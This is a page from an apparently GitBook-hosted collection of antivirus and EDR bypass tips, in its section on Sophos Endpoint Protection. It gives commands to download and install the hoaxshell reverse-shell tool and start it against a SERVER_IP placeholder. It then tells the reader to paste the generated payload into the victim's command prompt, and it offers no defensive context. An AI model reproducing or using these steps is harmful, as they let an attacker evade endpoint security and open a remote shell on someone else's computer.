🛡️
Awesome AV/EDR/XDR Bypass Tips
  • 「🛡️」Awesome AVs/EDRs/XDRs Bypass Tips
    • BitDefender
    • McAfee MVISION
    • Sophos
    • Windows Defender
Powered by GitBook
On this page
  • Bypassing Sophos Endpoint Protection With Hoaxshell
  • Execution
  1. 「🛡️」Awesome AVs/EDRs/XDRs Bypass Tips

Sophos

PreviousMcAfee MVISIONNextWindows Defender

Last updated 2 years ago

Bypassing Sophos Endpoint Protection With Hoaxshell

Download the hoaxshell in github

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

Command:

python3 hoaxshell.py -s SERVER_IP

Now just copy the payload generated by hoaxshell and go to the victim's cmd, now just paste the payload

Execution